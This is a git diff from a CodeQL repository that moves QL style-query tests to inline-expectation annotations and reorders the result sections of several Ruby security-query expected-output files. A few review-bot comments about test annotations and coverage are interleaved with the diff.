+class AnalysedInt extends int { // $ Alert AnalysedInt() { this = 7 } // 'analyses' should not be flagged diff --git a/ql/ql/test/queries/style/NonDocBlock/Foo.qll b/ql/ql/test/queries/style/NonDocBlock/Foo.qll index 99f957fa7704..22fc0e3761a7 100644 --- a/ql/ql/test/queries/style/NonDocBlock/Foo.qll +++ b/ql/ql/test/queries/style/NonDocBlock/Foo.qll 
@@ -1,13 +1,13 @@ /* * This should be QLDoc. - */ + */ // $ Alert /** * this is fine */ predicate foo() { any() } -/* Note: this is bad. */ +/* Note: this is bad. */ // $ Alert class Foo extends string { Foo() { this = "FOo" } } diff --git a/ql/ql/test/queries/style/NonDocBlock/NonDocBlock.qlref b/ql/ql/test/queries/style/NonDocBlock/NonDocBlock.qlref index b6dbdf506047..57118bb0ff76 100644 --- a/ql/ql/test/queries/style/NonDocBlock/NonDocBlock.qlref +++ b/ql/ql/test/queries/style/NonDocBlock/NonDocBlock.qlref @@ -1 +1,2 @@ -queries/style/NonDocBlock.ql \ No newline at end of file +query: queries/style/NonDocBlock.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/OmittableExists/OmittableExists.qlref b/ql/ql/test/queries/style/OmittableExists/OmittableExists.qlref index af9ad5ec40b5..c606ef984252 100644 --- a/ql/ql/test/queries/style/OmittableExists/OmittableExists.qlref +++ b/ql/ql/test/queries/style/OmittableExists/OmittableExists.qlref @@ -1 +1,2 @@ -queries/style/OmittableExists.ql \ No newline at end of file +query: queries/style/OmittableExists.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/OmittableExists/Test.qll b/ql/ql/test/queries/style/OmittableExists/Test.qll index 517758a9dabe..0312c86ec6e4 100644 --- a/ql/ql/test/queries/style/OmittableExists/Test.qll +++ b/ql/ql/test/queries/style/OmittableExists/Test.qll @@ -17,7 +17,7 @@ class Location extends @location_default { } predicate test() { - exists(int i | aPredicate(i)) // BAD + exists(int i | aPredicate(i)) // $ Alert // BAD or exists(int i | aPredicate(i) or anotherPredicate(i)) // BAD [NOT DETECTED] or diff --git a/ql/ql/test/queries/style/QlRefInlineExpectations/Test3.qlref b/ql/ql/test/queries/style/QlRefInlineExpectations/Test3.qlref index 5582a96837a3..f840a91b59ee 100644 --- a/ql/ql/test/queries/style/QlRefInlineExpectations/Test3.qlref 
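Review bot: In OmittableExists/Test.qll the known false negative two lines below the newly annotated `exists` is still recorded only as free text (`// BAD [NOT DETECTED]`), so it is the one case in `test()` that the inline-expectations format does not describe. The framework's missing-result marker keeps the gap in the same machine-readable vocabulary as the other expectations: `exists(int i | aPredicate(i) or anotherPredicate(i)) // $ MISSING: Alert // BAD [NOT DETECTED]`. `test()` continues past the end of the hunk, so any further cases in its body are not visible here.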
+++ b/ql/ql/test/queries/style/QlRefInlineExpectations/Test3.qlref @@ -1 +1,2 @@ -query: ProblemQuery.ql \ No newline at end of file +query: ProblemQuery.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/RedundantCast/Foo.qll b/ql/ql/test/queries/style/RedundantCast/Foo.qll index d993f654bc42..4410d344c9f7 100644 --- a/ql/ql/test/queries/style/RedundantCast/Foo.qll +++ b/ql/ql/test/queries/style/RedundantCast/Foo.qll @@ -2,10 +2,10 @@ class Foo extends string { Foo() { this = "Foo" } } -predicate test(Foo f) { f.(Foo).toString() = "X" } +predicate test(Foo f) { f.(Foo).toString() = "X" } // $ Alert -predicate test2(Foo a, Foo b) { a.(Foo) = b } +predicate test2(Foo a, Foo b) { a.(Foo) = b } // $ Alert predicate called(Foo a) { a.toString() = "X" } -predicate test3(string s) { called(s.(Foo)) } +predicate test3(string s) { called(s.(Foo)) } // $ Alert diff --git a/ql/ql/test/queries/style/RedundantCast/RedundantCast.qlref b/ql/ql/test/queries/style/RedundantCast/RedundantCast.qlref index 659062d3ae55..77bbbe67466e 100644 --- a/ql/ql/test/queries/style/RedundantCast/RedundantCast.qlref +++ b/ql/ql/test/queries/style/RedundantCast/RedundantCast.qlref @@ -1 +1,2 @@ -queries/style/RedundantCast.ql +query: queries/style/RedundantCast.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/RedundantImport/D.qll b/ql/ql/test/queries/style/RedundantImport/D.qll index 1badf0ebbc54..ba5df313cdbd 100644 --- a/ql/ql/test/queries/style/RedundantImport/D.qll +++ b/ql/ql/test/queries/style/RedundantImport/D.qll @@ -1,2 +1,2 @@ -import folder.A +import folder.A // $ Alert import folder.B diff --git a/ql/ql/test/queries/style/RedundantImport/RedundantImport.qlref b/ql/ql/test/queries/style/RedundantImport/RedundantImport.qlref index a2ff992e5cd8..acacf6163e54 100644 --- a/ql/ql/test/queries/style/RedundantImport/RedundantImport.qlref 
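Review bot: Adding `postprocess: utils/test/InlineExpectationsTestQuery.ql` to QlRefInlineExpectations/Test3.qlref may change what this test covers rather than how it is checked. The directory name suggests the `.qlref` files here are inputs to a query about inline-expectations usage, and a file holding only `query: ProblemQuery.ql` looks like the case that query is meant to flag. That is inferred from the path alone, since neither the query nor its `.expected` file appears in this hunk. If it holds, Test3.qlref should keep its original single line so the positive case is still exercised, and this is worth confirming against the `.expected` output before merging.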
+++ b/ql/ql/test/queries/style/RedundantImport/RedundantImport.qlref @@ -1 +1,2 @@ -queries/style/RedundantImport.ql \ No newline at end of file +query: queries/style/RedundantImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/RedundantOverride/RedundantOverride.qll b/ql/ql/test/queries/style/RedundantOverride/RedundantOverride.qll index 35df3b3194c5..01d4e128615b 100644 --- a/ql/ql/test/queries/style/RedundantOverride/RedundantOverride.qll +++ b/ql/ql/test/queries/style/RedundantOverride/RedundantOverride.qll @@ -6,7 +6,7 @@ module Test1 { } class Bar extends Foo { - override Foo pred() { result = Foo.super.pred() } // BAD + override Foo pred() { result = Foo.super.pred() } // $ Alert // BAD } } @@ -18,7 +18,7 @@ module Test2 { } class Bar extends Foo { - override Foo pred() { result = super.pred() } // BAD + override Foo pred() { result = super.pred() } // $ Alert // BAD } } @@ -107,7 +107,7 @@ module Test8 { } class Bar extends Foo { - override predicate pred(Foo f) { super.pred(f) } // BAD + override predicate pred(Foo f) { super.pred(f) } // $ Alert // BAD } } @@ -121,15 +121,15 @@ module Test9 { class Bar extends Foo { Bar() { this = 1 } - override Foo pred() { Foo.super.pred() = result } // BAD + override Foo pred() { Foo.super.pred() = result } // $ Alert // BAD } class Baz1 extends Foo, Bar { - override Foo pred() { Foo.super.pred() = result } // BAD + override Foo pred() { Foo.super.pred() = result } // $ Alert // BAD } class Baz2 extends Foo, Baz1 { - override Foo pred() { Baz1.super.pred() = result } // BAD + override Foo pred() { Baz1.super.pred() = result } // $ Alert // BAD } } @@ -147,7 +147,7 @@ module Test10 { } class Baz1 extends Foo, Bar { - override Foo pred() { result = Foo.super.pred() } // BAD + override Foo pred() { result = Foo.super.pred() } // $ Alert // BAD } } 
@@ -161,19 +161,19 @@ module Test11 { class Bar1 extends Foo { Bar1() { this = [1 .. 3] } - override Foo pred() { Foo.super.pred() = result } // BAD + override Foo pred() { Foo.super.pred() = result } // $ Alert // BAD } class Bar2 extends Foo, Bar1 { - override Foo pred() { Foo.super.pred() = result } // BAD + override Foo pred() { Foo.super.pred() = result } // $ Alert // BAD } class Bar3 extends Foo, Bar2 { - override Foo pred() { Bar2.super.pred() = result } // BAD + override Foo pred() { Bar2.super.pred() = result } // $ Alert // BAD } class Bar4 extends Bar2, Bar3 { - override Foo pred() { result = Bar2.super.pred() } // BAD + override Foo pred() { result = Bar2.super.pred() } // $ Alert // BAD } class Bar5 extends Foo { diff --git a/ql/ql/test/queries/style/RedundantOverride/RedundantOverride.qlref b/ql/ql/test/queries/style/RedundantOverride/RedundantOverride.qlref index aca59af1cceb..ac16aebc2e78 100644 --- a/ql/ql/test/queries/style/RedundantOverride/RedundantOverride.qlref +++ b/ql/ql/test/queries/style/RedundantOverride/RedundantOverride.qlref @@ -1 +1,2 @@ -queries/style/RedundantOverride.ql +query: queries/style/RedundantOverride.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/SwappedParameterNames/SwappedParameterNames.qlref b/ql/ql/test/queries/style/SwappedParameterNames/SwappedParameterNames.qlref index cab8c347410b..78ad77024ca5 100644 --- a/ql/ql/test/queries/style/SwappedParameterNames/SwappedParameterNames.qlref +++ b/ql/ql/test/queries/style/SwappedParameterNames/SwappedParameterNames.qlref @@ -1 +1,2 @@ -queries/style/SwappedParameterNames.ql \ No newline at end of file +query: queries/style/SwappedParameterNames.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/SwappedParameterNames/Test.qll b/ql/ql/test/queries/style/SwappedParameterNames/Test.qll index 5c8083d3098f..0ee3760c7cb9 100644 
--- a/ql/ql/test/queries/style/SwappedParameterNames/Test.qll +++ b/ql/ql/test/queries/style/SwappedParameterNames/Test.qll @@ -9,5 +9,5 @@ class Correct extends Sup { } class Wrong extends Sup { - override predicate step(Expr succ, Expr pred) { none() } // <- swapped parameter names + override predicate step(Expr succ, Expr pred) { none() } // $ Alert // <- swapped parameter names } diff --git a/ql/ql/test/queries/style/UseInstanceofExtension/Foo.qll b/ql/ql/test/queries/style/UseInstanceofExtension/Foo.qll index b58cb3f93e37..b6479e6fc3ad 100644 --- a/ql/ql/test/queries/style/UseInstanceofExtension/Foo.qll +++ b/ql/ql/test/queries/style/UseInstanceofExtension/Foo.qll @@ -4,7 +4,7 @@ class Range extends string { string getAChild() { result = "test" } } -class Inst extends string { +class Inst extends string { // $ Alert Range range; Inst() { this = range } @@ -12,13 +12,13 @@ class Inst extends string { string getAChild() { result = range.getAChild() } } -class Inst2 extends string { +class Inst2 extends string { // $ Alert Inst2() { this instanceof Range } string getAChild() { result = this.(Range).getAChild() } } -class Inst3 extends string { +class Inst3 extends string { // $ Alert Range range; Inst3() { this = range } @@ -26,6 +26,6 @@ class Inst3 extends string { Range getRange() { result = range } } -class Inst4 extends string { +class Inst4 extends string { // $ Alert Inst4() { this instanceof Range } } diff --git a/ql/ql/test/queries/style/UseInstanceofExtension/UseInstanceofExtension.qlref b/ql/ql/test/queries/style/UseInstanceofExtension/UseInstanceofExtension.qlref index 4b8a65157870..d895947b87b7 100644 --- a/ql/ql/test/queries/style/UseInstanceofExtension/UseInstanceofExtension.qlref +++ b/ql/ql/test/queries/style/UseInstanceofExtension/UseInstanceofExtension.qlref @@ -1 +1,2 @@ -queries/style/UseInstanceofExtension.ql \ No newline at end of file +query: queries/style/UseInstanceofExtension.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/ql/ql/test/queries/style/UseSetLiteral/UseSetLiteral.qlref b/ql/ql/test/queries/style/UseSetLiteral/UseSetLiteral.qlref index d4047ebc29fd..545dc8d48424 100644 --- a/ql/ql/test/queries/style/UseSetLiteral/UseSetLiteral.qlref +++ b/ql/ql/test/queries/style/UseSetLiteral/UseSetLiteral.qlref @@ -1 +1,2 @@ -queries/style/UseSetLiteral.ql \ No newline at end of file +query: queries/style/UseSetLiteral.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/UseSetLiteral/test.qll b/ql/ql/test/queries/style/UseSetLiteral/test.qll index fcc581c3e8cd..0fd1dab6ddde 100644 --- a/ql/ql/test/queries/style/UseSetLiteral/test.qll +++ b/ql/ql/test/queries/style/UseSetLiteral/test.qll @@ -4,7 +4,7 @@ predicate test1(int a) { a = 1 or // BAD a = 2 or a = 3 or - a = 4 + a = 4 // $ Alert } predicate test2(int a) { @@ -30,7 +30,7 @@ predicate test5() { test1(1) or // BAD test1(2) or test1(3) or - test1(4) + test1(4) // $ Alert } predicate test6() { @@ -44,7 +44,7 @@ int test7() { 1 = result or // BAD 2 = result or 3 = result or - 4 = result + 4 = result // $ Alert } predicate test8() { @@ -62,19 +62,19 @@ class MyTest8Class extends int { this = 1 or // BAD this = 2 or this = 3 or - this = 4 + this = 4 // $ Alert ) and ( s = "1" or // BAD s = "2" or s = "3" or - s = "4" + s = "4" // $ Alert ) and exists(float f | f = 1.0 or // BAD f = 1.5 or f = 2.0 or - f = 2.5 + f = 2.5 // $ Alert ) } @@ -89,7 +89,7 @@ predicate test9(MyTest8Class c) { c.is(1) or // BAD c.is(2) or c.is(3) or - c.is(4) + c.is(4) // $ Alert } predicate test10(MyTest8Class c) { @@ -133,5 +133,5 @@ predicate test14(int a) { (a = 2 or a = 3) or a = 4 - ) + ) // $ Alert } diff --git a/ql/ql/test/queries/style/ValidatePredicateGetReturns/ValidatePredicateGetReturns.qlref b/ql/ql/test/queries/style/ValidatePredicateGetReturns/ValidatePredicateGetReturns.qlref index e116f69d6b22..7a89245d787e 100644 
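Review bot: In UseSetLiteral/test.qll the new `// $ Alert` sits on the last disjunct (`a = 4`, `test1(4)`, `4 = result`, `c.is(4)`) while the existing `// BAD` stays on the first, so the two markers for one finding end up three lines apart. Nothing in the file says they belong together or why the expectation is on the closing line, and in the last hunk (`) // $ Alert`) the matching `// BAD` is not visible at all. A one-line comment at the first case would cover it, e.g. `// The alert for a multi-line disjunction is expected on its last line.`; the same applies to the hunks at -30, -44, -62, -89 and -133. That placement is presumably where the result location is matched, so confirm this before settling the wording.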
--- a/ql/ql/test/queries/style/ValidatePredicateGetReturns/ValidatePredicateGetReturns.qlref +++ b/ql/ql/test/queries/style/ValidatePredicateGetReturns/ValidatePredicateGetReturns.qlref @@ -1 +1,2 @@ -queries/style/ValidatePredicateGetReturns.ql +query: queries/style/ValidatePredicateGetReturns.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/ValidatePredicateGetReturns/test.qll b/ql/ql/test/queries/style/ValidatePredicateGetReturns/test.qll index 2cc4dec64d20..e9c34eb94a65 100644 --- a/ql/ql/test/queries/style/ValidatePredicateGetReturns/test.qll +++ b/ql/ql/test/queries/style/ValidatePredicateGetReturns/test.qll @@ -1,7 +1,7 @@ import ql // NOT OK -- Predicate starts with "get" but does not return a value -predicate getValue() { none() } +predicate getValue() { none() } // $ Alert // OK -- starts with get and returns a value string getData() { result = "data" } @@ -22,13 +22,13 @@ predicate getvalue() { none() } predicate retrieveValue() { none() } // NOT OK -- starts with get and does not return value -predicate getImplementation2() { none() } +predicate getImplementation2() { none() } // $ Alert // NOT OK -- is an alias for a predicate which does not have a return value -predicate getAlias2 = getImplementation2/0; +predicate getAlias2 = getImplementation2/0; // $ Alert // NOT OK -- starts with as and does not return value -predicate asValue() { none() } +predicate asValue() { none() } // $ Alert // OK -- starts with as but followed by a lowercase letter, probably should be ignored predicate assessment() { none() } @@ -45,7 +45,7 @@ HiddenType getInjectableCompositeActionNode() { predicate implementation4() { none() } // NOT OK -- is an alias -predicate getAlias4 = implementation4/0; +predicate getAlias4 = implementation4/0; // $ Alert // OK -- is an alias predicate alias5 = implementation4/0; 
@@ -58,7 +58,7 @@ predicate edge(int x, int y) { none() } int getDistance(int x) = shortestDistances(root/0, edge/2)(_, x, result) // NOT OK -- Higher-order predicate that does not return a value even though has 'get' in the name -predicate getDistance2(int x, int y) = shortestDistances(root/0, edge/2)(_, x, y) +predicate getDistance2(int x, int y) = shortestDistances(root/0, edge/2)(_, x, y) // $ Alert // OK predicate unresolvedAlias = unresolved/0; diff --git a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.expected b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.expected index 2631d47b89f4..e2f8d0cb2304 100644 --- a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.expected +++ b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.expected 
@@ -1,24 +1,3 @@ -#select -| gzipBombs.rb:6:3:6:34 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:6:3:6:34 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:7:3:9:5 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:7:3:9:5 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:10:3:14:5 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:10:3:14:5 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:15:22:15:53 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:15:22:15:53 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:20:3:20:50 | call to new | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:20:3:20:50 | call to new | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:21:3:21:50 | call to new | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:21:3:21:50 | call to new | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:25:3:25:40 | call to zcat | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:25:3:25:40 | call to zcat | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| zipBombs.rb:6:3:11:5 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:6:3:11:5 | call to open | This file Decompression depends on a $@. 
| zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:12:3:14:5 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:12:3:14:5 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:15:11:15:45 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:15:11:15:45 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:17:3:17:42 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:17:3:17:42 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:18:3:18:51 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:18:3:18:51 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:28:7:28:33 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:28:7:28:33 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:34:5:34:17 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:34:5:34:17 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:35:5:35:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:35:5:35:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:41:7:41:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:41:7:41:31 | call to read | This file Decompression depends on a $@. 
| zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:42:7:42:19 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:42:7:42:19 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:46:10:46:36 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:46:10:46:36 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:51:8:51:34 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:51:8:51:34 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:55:5:55:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:55:5:55:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | edges | gzipBombs.rb:4:3:4:11 | gzip_path | gzipBombs.rb:6:25:6:33 | gzip_path | provenance | | | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:4:15:4:27 | ...[...] | provenance | | 
@@ -112,3 +91,24 @@ nodes | zipBombs.rb:53:29:53:40 | zipfile_path | semmle.label | zipfile_path | | zipBombs.rb:55:5:55:31 | call to read | semmle.label | call to read | subpaths +#select +| gzipBombs.rb:6:3:6:34 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:6:3:6:34 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:7:3:9:5 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:7:3:9:5 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:10:3:14:5 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:10:3:14:5 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:15:22:15:53 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:15:22:15:53 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:20:3:20:50 | call to new | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:20:3:20:50 | call to new | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:21:3:21:50 | call to new | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:21:3:21:50 | call to new | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:25:3:25:40 | call to zcat | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:25:3:25:40 | call to zcat | This file Decompression depends on a $@. 
| gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| zipBombs.rb:6:3:11:5 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:6:3:11:5 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:12:3:14:5 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:12:3:14:5 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:15:11:15:45 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:15:11:15:45 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:17:3:17:42 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:17:3:17:42 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:18:3:18:51 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:18:3:18:51 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:28:7:28:33 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:28:7:28:33 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:34:5:34:17 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:34:5:34:17 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:35:5:35:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:35:5:35:31 | call to read | This file Decompression depends on a $@. 
| zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:41:7:41:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:41:7:41:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:42:7:42:19 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:42:7:42:19 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:46:10:46:36 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:46:10:46:36 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:51:8:51:34 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:51:8:51:34 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:55:5:55:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:55:5:55:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | diff --git a/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.expected b/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.expected index da8f84eabfba..635cfcd4b3e7 100644 --- a/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.expected +++ b/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.expected 
@@ -1,6 +1,3 @@ -#select -| ImproperLdapAuth.rb:15:23:15:26 | pass | ImproperLdapAuth.rb:5:12:5:17 | call to params | ImproperLdapAuth.rb:15:23:15:26 | pass | This LDAP authentication depends on a $@. | ImproperLdapAuth.rb:5:12:5:17 | call to params | user-provided value | -| ImproperLdapAuth.rb:31:24:31:27 | pass | ImproperLdapAuth.rb:24:12:24:17 | call to params | ImproperLdapAuth.rb:31:24:31:27 | pass | This LDAP authentication depends on a $@. | ImproperLdapAuth.rb:24:12:24:17 | call to params | user-provided value | edges | ImproperLdapAuth.rb:5:5:5:8 | pass | ImproperLdapAuth.rb:15:23:15:26 | pass | provenance | | | ImproperLdapAuth.rb:5:12:5:17 | call to params | ImproperLdapAuth.rb:5:12:5:24 | ...[...] | provenance | | @@ -18,3 +15,6 @@ nodes | ImproperLdapAuth.rb:24:12:24:24 | ...[...] | semmle.label | ...[...] | | ImproperLdapAuth.rb:31:24:31:27 | pass | semmle.label | pass | subpaths +#select +| ImproperLdapAuth.rb:15:23:15:26 | pass | ImproperLdapAuth.rb:5:12:5:17 | call to params | ImproperLdapAuth.rb:15:23:15:26 | pass | This LDAP authentication depends on a $@. | ImproperLdapAuth.rb:5:12:5:17 | call to params | user-provided value | +| ImproperLdapAuth.rb:31:24:31:27 | pass | ImproperLdapAuth.rb:24:12:24:17 | call to params | ImproperLdapAuth.rb:31:24:31:27 | pass | This LDAP authentication depends on a $@. | ImproperLdapAuth.rb:24:12:24:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.expected b/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.expected index 36cb35dfaffb..581157b61235 100644 --- a/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.expected +++ b/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.expected 
@@ -1,6 +1,6 @@ -#select -| InsecureRandomness.rb:6:42:6:57 | call to rand | InsecureRandomness.rb:6:42:6:57 | call to rand | InsecureRandomness.rb:6:42:6:57 | call to rand | This uses a cryptographically insecure random number generated at $@ in a security context. | InsecureRandomness.rb:6:42:6:57 | call to rand | call to rand | edges nodes | InsecureRandomness.rb:6:42:6:57 | call to rand | semmle.label | call to rand | subpaths +#select +| InsecureRandomness.rb:6:42:6:57 | call to rand | InsecureRandomness.rb:6:42:6:57 | call to rand | InsecureRandomness.rb:6:42:6:57 | call to rand | This uses a cryptographically insecure random number generated at $@ in a security context. | InsecureRandomness.rb:6:42:6:57 | call to rand | call to rand | diff --git a/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.expected b/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.expected index 1e6ebba4f852..1eec0daa4c4c 100644 --- a/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.expected +++ b/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.expected 
